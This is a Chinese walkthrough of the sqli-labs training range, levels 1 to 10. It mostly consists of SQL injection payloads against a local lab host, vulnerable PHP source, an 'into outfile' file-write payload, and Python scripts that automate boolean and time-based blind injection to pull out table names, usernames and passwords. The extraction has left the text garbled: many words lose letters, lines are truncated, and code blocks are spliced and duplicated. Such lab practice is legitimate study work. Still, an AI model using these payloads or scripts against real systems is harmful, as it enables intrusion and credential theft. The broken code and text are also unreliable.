【靶场练习_sqli

更新时间:2023-11-05 17:27:44 阅读: 评论:0

喜羊羊与灰太狼虎虎生威-孤舟一系故园心

【靶场练习_sqli
2023年11月5日发(作者:野有蔓草小说)

【靶场练习_sqli-labsSQLi-LABSPage-1BasicChallenges

GET

Less-1:简单题

1.

order by得出待查表⾥有三个字段

192.168.40.165/sqli-labs-master/Less-1/?id=1' order by 3--+

2.union lect得到数据库名——curity

192.168.40.165/sqli-labs-master/Less-1/?id=-1' union lect 1,databa(),2--+

3.lect group_concat(table_name) from information_s where table_schema=databa()得到数据表名——emails,referers,referers,uagents,urs

192.168.40.165/sqli-labs-master/Less-1/?id=-1' union lect 1,databa(),(lect group_concat(table_name) from information_s where

table_schema=databa())--+

4.lect group_concat(column_name) from information_s where table_name='emails'得到数据表中的字段名——id,email_id

192.168.40.165/sqli-labs-master/Less-1/?id=-1' union lect 1,(lect group_concat(column_name) from information_s where

table_name='emails'),databa()--+

5.lect group_concat(id,email_id) from emails 得到字段的值——

name:1Dumb@,2Angel@,3Dummy@,4cure@,5stupid@,6superman@,7batman@,8admin@dhakkan.c

192.168.40.165/sqli-labs-master/Less-1/?id=-1' union lect 1,(lect group_concat(id,email_id) from emails),databa()--+

less-2:简单题

2⾥⾯"and"居然失效了,好迷啊,索性"order by"还可以⽤

有三列数据:

192.168.40.165/sqli-labs-master/Less-2/?id=1 order by 3--+

当前数据库:curity

192.168.40.165/sqli-labs-master/Less-2/?id=-1 union lect 1,databa(),3--+

curity⾥⾯的数据表:_emails,_emails,_referers,_referers,_referers,_uagents,_uagents,_uagents,_uagents,_urs,_urs,_urs

192.168.40.165/sqli-labs-master/Less-2/?id=-1 union lect 1,databa(),(lect group_concat('_',table_name) from information_s where table_schema=databa())--+

urs表⾥的字段:ur_id,first_name,last_name,ur,password,avatar,id,urname,password

192.168.40.165/sqli-labs-master/Less-2/?id=-1 union lect 1,databa(),(lect group_concat(column_name) from information_s where table_name='urs')--+

得到字段值:DumbDumb,AngelinaI-kill-

you,Dummyp@ssword,curecrappy,stupidstupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,admin3admin3,dhakkandumbo,admin4admin4

192.168.40.165/sqli-labs-master/Less-2/?id=-1 union lect 1,(lect group_concat(urname,password) from urs),(lect group_concat(column_name) from

information_s where table_name='urs')--+

less-3:单引号+括号闭合

DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "/TR/xhtml1/DTD/">

<html xmlns="/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; chart=utf-8" />

<title>Less-3 Error Bad- String (with Twist) title>

head>

<body bgcolor="#000000">

<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome   <font color="#FF0000"> Dhakkan font><br>

<font size="3" color="#FFFF00">

<?php

//including the Mysql connect parameters.

include("../sql-connections/");

error_reporting(0);

// take the variables

if(ist($_GET['id']))

{

$id=$_GET['id'];

//logging the connection parameters to a file for analysis.

$fp=fopen('','a');

fwrite($fp,'ID:'.$id."n");

fclo($fp);

// connectivity

$sql="SELECT * FROM urs WHERE id=('') LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

if($row)

{

echo "";

echo 'Your Login name:'. $row['urname'];

echo "
";

echo 'Your Password:' .$row['password'];

echo "";

}

el

{

echo '';

print_r(mysql_error());

echo "";

}

}

el { echo "Plea input the ID as parameter with numeric value";}

>

font> div>br>br>br><center>

<img src="../images/" />center>

body>

html>

源码

数据库:curity

192.168.40.165/sqli-labs-master/Less-3/

id=--1') union lect 1,2,databa() %23

数据表:emails,referers,uagents,urs

192.168.40.165/sqli-labs-master/Less-3/

id=--1') union lect 1,2,group_concat(table_name) from information_s where table_schema=databa() %23

列名:ur_id,first_name,last_name,ur,password,avatar,id,urname,password

192.168.40.165/sqli-labs-master/Less-3/

id=--1') union lect 1,2,group_concat(column_name) from information_s where table_name='urs' %23

字段值:Dumb,Angelina,Dummy,cure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

192.168.40.165/sqli-labs-master/Less-3/

id=--1') union lect 1,2,group_concat(urname) from urs %23

less-4:双引号+括号闭合

双引号闭合:两条语句回显不同

id=1" and "0

id=1" and "1

括号闭合: u near 'union lect 1,2,3 #") LIMIT 0,1' at line 1

192.168.40.165/sqli-labs-master/Less-4/

id=1" union lect 1,2,3 %23

192.168.40.165/sqli-labs-master/Less-4/

id=1") union lect 1,2,3 %23

数据库:curity

192.168.40.165/sqli-labs-master/Less-4/

id=-1") union lect 1,databa(),2 %23

数据表:emails,referers,uagents,urs

192.168.40.165/sqli-labs-master/Less-4/

id=-1") union lect 1,group_concat(table_name),3 from information_ where table_schema=databa()%23

列名:ur_id,first_name,last_name,ur,password,avatar,id,urname,password

192.168.40.165/sqli-labs-master/Less-4/

id=-1") union lect 1,group_concat(column_name),3 from information_s where table_name='urs'%23

字段值:Dumb,Angelina,Dummy,cure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

192.168.40.165/sqli-labs-master/Less-4/

id=-1") union lect 1,group_concat(urname),3 from urs%23

less-5:盲注单引号闭合,看到有的师傅说报错也可以做,有时间试试

这⾥补⼀个函数,⼀开始使⽤substr来切割,发现怎么写也不⾏,然后⽤的是left()

LEFT(str,len)

返回最左边的n个字符的字符串str,或NULL如果任何参数是NULL

SQL> SELECT LEFT('foobarbar', 5);

+---------------------------------------------------------+

| LEFT('foobarbar', 5) |

+---------------------------------------------------------+

| fooba |

+---------------------------------------------------------+

1 row in t (0.00 c)

//原⽂出⾃【易百教程】,商业转载请联系作者获得授权,⾮商业转载请保留原⽂链接:/sql/

'''

@Modify Time @Author

------------ -------

2019/9/29 13:26 laoalo

'''

import requests

from lxml import etree

import time

tag = "You "

d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM,"

def databa_length():

'''

数据库长度爆破

:return: 数据库长度

'''

global tag

url = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and length(databa())="

i = 0

while True:

urls = url + str(i) + '%23'

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment=htmlelmet[0]

urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and left(databa(),"+str(j)+")='"+databa+i+"'--+"

respon = (url=urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

databa += i

break

return databa

def table_name_no_ascii(length):

'''

不⽤ascii的⽅法求表名,就直接遍历字典,等有空的时候完善

:param length:

:return:

'''

global d

table=""

for j in range(length+1):

for i in d:

urls="192.168.40.165/sqli-labs-master/Less-5/?id=1'and substr((lect table_name from information_ where table_schema=databa() limit 0,1),1,1)"+i+"--+"

respon = (url=urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

table += i

break

return table

def table_length():

'''

计算当前数据库中所有的表的长

:return: 表长

'''

global tag

i = 0

while True:

urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and length((lect group_concat(table_name) from information_s where table_schema=databa()))=" + str(i) + "--+

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

return i

el:

i += 1

def table_name(length):

'''

ascii法爆破数据表

:return: 表长

'''

global tag

table=""

for j in range(length+1):

'''

i 的往上增,直到超了

'''

i = 0

while i<=122:

urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and ascii(substr((lect group_concat(table_name) from information_ where table_schema=databa()),"+str(j)+",1))<

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

break

el:

i+=10

'''

此时i⾃减1开始定位名字

elment = htmlelmet[0]

if elment == tag:

return i

el:

i += 1

def column_name(length,table_name):

'''

ascii法爆破字段

:return: 表长

'''

global tag

table=""

for j in range(length+1):

'''

10的往上增,直到超了

'''

i = 0

while i<=122:

urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and ascii(substr((lect group_concat(column_name) from information_s where table_name='"+table_name+"'),"+str(j)+

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

break

el:

i+=10

'''

此时i⾃减1开始定位名字

'''

print("开始⾃减")

while i>0:

urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and ascii(substr((lect group_concat(column_name) from information_s where table_name='"+table_name+"'),"+str(j)+

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

table +=chr(i)

print('表名=',table)

break

el:

i-=1

return table

def data_length(colums,table):

'''

得到数据的长度

:param colums: 字段名

:param table: 表名

:return: 数据的长度

'''

global tag

i = 0

while i < 1000:

urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and length((lect group_concat("+colums+") from "+table+"))="+str(i) + "--+"

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

return i

el:

i += 1

def data_datail(length,colums,table):

'''

得到数据表中的值

:param length: 值得长度

:param colums: 查询的字段名

:param table: 查询的表名

:return: 字段值

'''

global d

data = ""

for j in range(1,length+1):

for i in d:

urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and left((lect group_concat("+colums+") from "+table+"), "+str(j)+" )='"+data+i+"'--+"

print(urls)

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

data += i

print(colums,'字段值=',data)

break

'''

@Modify Time @Author

------------ -------

2019/9/29 13:26 laoalo

'''

import requests

from lxml import etree

import time

tag = "You "

d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM,"

def databa_length():

'''

数据库长度爆破

:return: 数据库长度

'''

global tag

url = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and length(databa())='

i = 0

while True:

urls = url + str(i) + '%23'

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment=htmlelmet[0]

if elment == tag:

return i

el:

i += 1

def databa_name(length):

'''

爆破数据库名

:param length: 数据库长度

:return: 数据库名

'''

global d

databa=""

for j in range(length+1):

for i in d:

urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and left(databa(),'+str(j)+')="'+databa+i+'"--+'

respon = (url=urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

databa += i

break

return databa

def table_name_no_ascii(length):

'''

不⽤ascii的⽅法求表名,就直接遍历字典,等有空的时候完善

:param length:

:return:

'''

global d

table=""

for j in range(length+1):

for i in d:

urls='192.168.40.165/sqli-labs-master/Less-6/?id=1" and substr((lect table_name from information_ where table_schema=databa() limit 0,1),1,1)'+i+'--+'

respon = (url=urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

'''

global tag

i = 0

while True:

urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and length((lect group_concat(table_name) from information_s where table_schema=databa()))=' + str(i) + '--+'

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

return i

el:

i += 1

def table_name(length):

'''

ascii法爆破数据表

:return: 表长

'''

global tag

table = ""

for j in range(length+1):

'''

i 的往上增,直到超了

'''

i = 0

while i <= 122:

urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and ascii(substr((lect group_concat(table_name) from information_ where table_schema=databa()),'+str(j)+',1))<

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

break

el:

i+=10

'''

此时i⾃减1开始定位名字

'''

print("开始⾃减",end="")

while i>0:

urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and ascii(substr((lect group_concat(table_name) from information_ where table_schema=databa()),'+str(j)+',1))=

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

table +=chr(i)

print('表名=',table)

break

el:

i-=1

return table

def colums_length(table_name):

'''

查询指定表的字段值

:param table_name: 表名

:return:

'''

global tag

i = 0

while i<1000:

urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and length((lect group_concat(column_name) from information_s where table_name="'+table_name+'"))=' + str(i) +

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

table +=chr(i)

print('表名=',table)

break

el:

i-=1

return table

def data_length(colums,table):

'''

得到数据的长度

:param colums: 字段名

:param table: 表名

:return: 数据的长度

'''

global tag

i = 0

while i < 1000:

urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and length((lect group_concat('+colums+') from '+table+'))='+str(i) + '--+'

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

return i

el:

i += 1

def data_datail(length,colums,table):

'''

得到数据表中的值

:param length: 值得长度

:param colums: 查询的字段名

:param table: 查询的表名

:return: 字段值

'''

global d

data = ""

for j in range(1,length+1):

for i in d:

urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and left((lect group_concat('+colums+') from '+table+'), '+str(j)+' )="'+data+i+'"--+'

print(urls)

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

data += i

print(colums,'字段值=',data)

break

print(data)

if __name__ == '__main__':

# print(databa_length()) #8

# print(databa_name(8)) #curity

# print(table_length()) #90

# print(table_name(90)) #emails,referers,uagents,urs

# print(colums_length('emails')) #11

# print(column_name(11,'emails')) #id,email_id

# print(data_length('id','emails')) #15

print(data_datail(15,'id','emails')) #id 字段值= 1,2,3,4,5,6,7,8

盲注脚本

Less-7:⽂件上传

id=0 union lect 1,@@datadir,@@badir MYSQL--+

id=1')) union lect 1,2,'' into outfile './7' --+

PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "/TR/xhtml1/DTD/">

Less-7 Dump into Outfile

Welcome    Dhakkan

<?php

//including the Mysql connect parameters.

include("../sql-connections/");

error_reporting(0);

// take the variables

if(ist($_GET['id']))

{

$id=$_GET['id'];

//logging the connection parameters to a file for analysis.

$fp=fopen('','a');

fwrite($fp,'ID:'.$id."n");

fclo($fp);

// connectivity

$sql="SELECT * FROM urs WHERE id=(('$id')) LIMIT 0,1";

$result=mysql_query($sql);

$row = mysql_fetch_array($result);

if($row)

{

echo '';

echo 'You ';

echo "
"
;

echo "";

}

el

{

echo '';

echo 'You have an error in your SQL syntax';

//print_r(mysql_error());

echo "";

}

}

el { echo "Plea input the ID as parameter with numeric value";}

>




源码

Your Login name:/var/lib/mysql/

Your Password:/usr/

1badir 参数

解释:该参数指定了安装 MySQL 的安装路径,填写全路径可以解决相对路径所造成的问题。

例如:badir="E:/dev/MySQL/MySQL Server 5.2/"表⽰我的 MySQL 安装在 E:/dev/MySQL/MySQL Server 5.2/ 路径下。

2datadir 参数

解释:该参数指定了 MySQL 的数据库⽂件放在什么路径下。数据库⽂件即我们常说的 MySQL data ⽂件。

例如:datadir="E:/dev/MySQL/MySQL Server 5.2/Data/"则表⽰我的 MySQL 数据库⽂件放在 E:/dev/MySQL/MySQL Server 5.2/Data/ 路径下。

Less-8:单引号闭合的回显盲注

判断条件:

单引号:

id=1' and '1

id=1' and '0

这次实验的是usrs表中的password,发现直接遍历会出现⼤⼩写不敏感的错误,⼜写了⼀个ascii版本,可以区分⼤⼩写,后来查资料才知道,有可能是sql不区分⼤⼩写导致

'''

@Modify Time @Author

------------ -------

2019/10/4 10:21 laoalo

'''

import requests

from lxml import etree

import time

tag = "You "

d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM,-@!"

def databa_length():

'''

数据库长度爆破

:return: 数据库长度

'''

global tag

url = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length(databa())="

i = 0

while True:

urls = url + str(i) + '%23'

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment=htmlelmet[0]

if elment == tag:

return i

el:

i += 1

def databa_name(length):

'''

爆破数据库名

:param length: 数据库长度

:return: 数据库名

'''

global d

databa=""

for j in range(length+1):

for i in d:

urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and left(databa(),"+str(j)+")='"+databa+i+"'--+"

respon = (url=urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

databa += i

break

return databa

def table_name_no_ascii(length):

'''

不⽤ascii的⽅法求表名,就直接遍历字典,等有空的时候完善

:param length:

:return:

'''

global d

table=""

for j in range(length+1):

for i in d:

urls="192.168.40.165/sqli-labs-master/Less-8/?id=1'and substr((lect table_name from information_ where table_schema=databa() limit 0,1),1,1)"+i+"--+"

respon = (url=urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

table += i

break

return table

def table_length():

'''

计算当前数据库中所有的表的长

:return: 表长

'''

global tag

i = 0

while True:

urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((lect group_concat(table_name) from information_s where table_schema=databa()))=" + str(i) + "--+"

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

return table

def colums_length(table_name):

'''

查询指定表的字段值

:param table_name: 表名

:return:

'''

global tag

i = 0

while i<1000:

urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((lect group_concat(column_name) from information_s where table_name='"+table_name+"'))=" + str(i) + "--+"

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

return i

el:

i += 1

def column_name(length,table_name):

'''

ascii法爆破字段

:return: 表长

'''

global tag

table=""

for j in range(length+1):

'''

10的往上增,直到超了

'''

i = 0

while i<=122:

urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((lect group_concat(column_name) from information_s where table_name='"+table_name+"'),"+str(j)+",1))<" + str(i) + "--+"

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

break

el:

i+=10

'''

此时i⾃减1开始定位名字

'''

print("开始⾃减")

while i>0:

urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((lect group_concat(column_name) from information_s where table_name='"+table_name+"'),"+str(j)+",1))=" +str(i) + "--+"

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

table +=chr(i)

print('表名=',table)

break

el:

i-=1

return table

if __name__ == '__main__':

# print(table_length()) #90

# print(table_name(90)) #emails,referers,uagents,urs

# print(colums_length('urs')) #70

# print(column_name(70,'urs')) #ur_id,first_name,last_name,ur,password,avatar,id,urname,passwordur_id,first_name,last_name,ur,password,avatar,id,urname,password

# print(data_length('password','urs'))#96

print(data_datail(96,'password','urs'))#dumb,i-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4dumb,i-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,ad

全⼩写版

'''

@Modify Time @Author

------------ -------

2019/10/4 10:21 laoalo

'''

import requests

from lxml import etree

import time

tag = "You "

d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM,-@!"

def databa_length():

'''

数据库长度爆破

:return: 数据库长度

'''

global tag

url = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length(databa())="

i = 0

while True:

urls = url + str(i) + '%23'

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment=htmlelmet[0]

if elment == tag:

return i

el:

i += 1

def databa_name(length):

'''

爆破数据库名

:param length: 数据库长度

:return: 数据库名

'''

global d

databa=""

for j in range(length+1):

for i in d:

urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and left(databa(),"+str(j)+")='"+databa+i+"'--+"

respon = (url=urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

databa += i

break

return databa

def table_name_no_ascii(length):

'''

不⽤ascii的⽅法求表名,就直接遍历字典,等有空的时候完善

:param length:

:return:

'''

global d

table=""

for j in range(length+1):

for i in d:

urls="192.168.40.165/sqli-labs-master/Less-8/?id=1'and substr((lect table_name from information_ where table_schema=databa() limit 0,1),1,1)"+i+"--+"

respon = (url=urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

table=""

for j in range(length+1):

'''

i 的往上增,直到超了

'''

i = 0

while i<=122:

urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((lect group_concat(table_name) from information_ where table_schema=databa()),"+str(j)+",1))<

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

break

el:

i+=10

'''

此时i⾃减1开始定位名字

'''

print("开始⾃减")

while i>0:

urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((lect group_concat(table_name) from information_ where table_schema=databa()),"+str(j)+",1))=

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

table +=chr(i)

print('表名=',table)

break

el:

i-=1

return table

def colums_length(table_name):

'''

查询指定表的字段值

:param table_name: 表名

:return:

'''

global tag

i = 0

while i<1000:

urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((lect group_concat(column_name) from information_s where table_name='"+table_name+"'))=" + str(i) +

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

return i

el:

i += 1

def column_name(length,table_name):

'''

ascii法爆破字段

:return: 表长

'''

global tag

table=""

for j in range(length+1):

'''

10的往上增,直到超了

'''

i = 0

global tag

i = 0

while i < 1000:

urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((lect group_concat("+colums+") from "+table+"))="+str(i) + "--+"

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

print(urls)

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

return i

el:

i += 1

def data_datail(length,colums,table):

'''

得到数据表中的值

:param length: 值得长度

:param colums: 查询的字段名

:param table: 查询的表名

:return: 字段值

'''

global d

data = ""

for j in range(1,length+1):

for i in range(32,128):

urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substring((lect group_concat("+colums+") from "+table+"),"+str(j)+",1))="+str(i)+"--+"

respon = (urls).text

htmlelmet = (respon).xpath('//font[@size="5"]/text()')

if htmlelmet:

elment = htmlelmet[0]

if elment == tag:

data += chr(i)

print(colums,'字段值=',data)

break

# print(data)

if __name__ == '__main__':

# print(table_length())

# print(table_name(90))

# print(colums_length('urs'))

# print(column_name(70,'urs'))

# print(data_length('password','urs'))

print(data_datail(96,'password','urs'))

正确版

Less-9:时间盲注+单引号闭合

单引号+时间盲注:

id=1' and sleep(3)--+

1 '''

2 @Modify Time @Author

3 ------------ -------

4 2019/10/2 20:04 laoalo

5 '''

6 # -*- coding:utf-8 -*-

7 import requests

8 import time

9

10 url = "192.168.40.165/sqli-labs-master/Less-9/?id=1'"

11 def databa_length():

12 global url

13 for i in range(1,10000):

14 sql = url + " and if((lect length(databa()))>"+str(i)+",0,sleep(3)) +--+"

15 s_time = ()

16 respon = (url=sql,timeout=3)

17 e_time = ()

18 print(sql)

19 if(e_time-s_time) > 3:

20 print("数据库长:",i)

21 break

22 def databa_name(databa_length):

23 global url

24 sql = url + " and if(ascii(substr((lect databa()),{num},1))>{asc},0,sleep(3)) +--+"

25 db_name = ''

26 for num in range(1, databa_length+1):

27 for asc in range(ord('a'), ord('z') + 1):

28 s_time = ()

29 ((num=num, asc=asc))

30 e_time = ()

31 if (e_time - s_time) > 3:

32 db_name += chr(asc)

33 print("数据库名:",db_name)

34 break

35 def table_length(databa_name):

36 global url

37 for i in range(1, 10000):

38 sql = url + " and if((lect length((lect group_concat(table_name) from information_ where table_schema='"+databa_name+"')))>" + str(i) + ",0,sleep(3)) +--+"

39 s_time = ()

40 respon = (url=sql, timeout=3)

41 e_time = ()

42 print(sql)

43 if (e_time - s_time) > 3:

44 print(databa_name,"中的所有数据表名长:", i)

45 break

46 def table_name(table_length,databa_name):

47 global url

48 sql = url + " and if(ascii(substr((lect group_concat(table_name parator '@') from information_ where table_schema='"+databa_name+"'),{num},1))>{asc},0,sleep(3)) +--+"

49 table_name = ''

50 for num in range(1, table_length + 1):

51 for asc in range(32, 128):

52 s_time = ()

53 ((num=num, asc=asc))

54 e_time = ()

55 if (e_time - s_time) > 3:

56 table_name += chr(asc)

57 print("所有的数据表名:", table_name)

58 break

59 def column_length(table_name,databa_name):

60 global url

61 for i in range(1, 10000):

62 sql = url + " and if((lect length((lect group_concat(column_name) from information_s where table_name='" + table_name + "' and table_schema='"+databa_name+"')))>

63 s_time = ()

64 (url=sql, timeout=3)

65 e_time = ()

66 # print(sql)

67 if (e_time - s_time) > 3:

68 print(table_name, "中的所有字段名长:", i)

69 break

70 def column_name(column_length,table_name,databa_name):

71 global url

72 sql = url + " and if(ascii(substr((lect group_concat(column_name parator '@') from information_s where table_name='" + table_name + "' and table_schema='"+databa_name+

73 table_name = ''

74 for num in range(1, column_length + 1):

75 for asc in range(32, 128):

76 s_time = ()

77 ((num=num, asc=asc))

78 e_time = ()

79 if (e_time - s_time) > 3:

80 table_name += chr(asc)

81 print("所有的数据表名:", table_name)

82 break

83 def data_length(column_name,table_name):

84 global url

85 for i in range(1, 10000):

86 sql = url + " and if((lect length((lect group_concat("+column_name+" parator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(3)) +--+"

87 s_time = ()

88 (url=sql, timeout=3)

89 e_time = ()

90 # print(sql)

91 if (e_time - s_time) > 3:

92 print(column_name, "字段的值长:", i)

93 break

94 def data_detail(data_length,column_name,table_name):

95 global url

96 sql = url + " and if(ascii(substr((lect group_concat("+column_name+" parator '@') from " + table_name + "),{num},1))>{asc},0,sleep(3)) +--+"

97 data = ''

98 for num in range(1, data_length + 1):

99 for asc in range(32, 128):

100 s_time = ()

101 ((num=num, asc=asc))

102 e_time = ()

103 if (e_time - s_time) > 3:

104 data += chr(asc)

105 print(column_name,"字段的值:", data)

106 break

107 if __name__ == '__main__':

108 # databa_length() # 8

109 # databa_name(8) #curity

110 # table_length('curity')#curity 中的所有数据表名长: 29

111 # table_name(29, 'curity')#所有的数据表名: emails@referers@uagents@urs

112 # column_length('urs','curity') #20

113 # column_name(20,'urs','curity')#所有的数据表名: id@urname@password

114 # data_length('urname', 'urs')#91

115 data_detail(91, 'urname', 'urs')#urname 字段的值: Dumb@Angelina@Dummy@cure@stupid@superman@batman@admin@admin1@admin2@admin3@dhakkan@admin4

脚本

Less-10:时间盲注+双引号闭合

双引号+时间盲注

id=1" and sleep(3)--+

1 '''

2 @Modify Time @Author

3 ------------ -------

4 2019/10/2 16:56 laoalo

5 '''

6 # -*- coding:utf-8 -*-

7 import requests

8 import time

9

10 url = '192.168.40.165/sqli-labs-master/Less-10/?id=1"'

11 def databa_length():

12 global url

13 for i in range(1,10000):

14 sql = url + " and if((lect length(databa()))>"+str(i)+",0,sleep(3)) +--+"

15 s_time = ()

16 respon = (url=sql,timeout=3)

17 e_time = ()

18 print(sql)

19 if(e_time-s_time) > 3:

20 print("数据库长:",i)

21 break

22 def databa_name(databa_length):

23 global url

24 sql = url + " and if(ascii(substr((lect databa()),{num},1))>{asc},0,sleep(3)) +--+"

25 db_name = ''

26 for num in range(1, databa_length+1):

27 for asc in range(ord('a'), ord('z') + 1):

28 s_time = ()

29 ((num=num, asc=asc))

30 e_time = ()

31 if (e_time - s_time) > 3:

32 db_name += chr(asc)

33 print("数据库名:",db_name)

34 break

35 def table_length(databa_name):

36 global url

37 for i in range(1, 10000):

38 sql = url + " and if((lect length((lect group_concat(table_name) from information_ where table_schema='"+databa_name+"')))>" + str(i) + ",0,sleep(3)) +--+"

39 s_time = ()

40 respon = (url=sql, timeout=3)

41 e_time = ()

42 print(sql)

43 if (e_time - s_time) > 3:

44 print(databa_name,"中的所有数据表名长:", i)

45 break

46 def table_name(table_length,databa_name):

47 global url

48 sql = url + " and if(ascii(substr((lect group_concat(table_name parator '@') from information_ where table_schema='"+databa_name+"'),{num},1))>{asc},0,sleep(3)) +--+"

49 table_name = ''

50 for num in range(1, table_length + 1):

51 for asc in range(32, 128):

52 s_time = ()

53 ((num=num, asc=asc))

54 e_time = ()

55 if (e_time - s_time) > 3:

56 table_name += chr(asc)

57 print("所有的数据表名:", table_name)

58 break

59 def column_length(table_name,databa_name):

60 global url

61 for i in range(1, 10000):

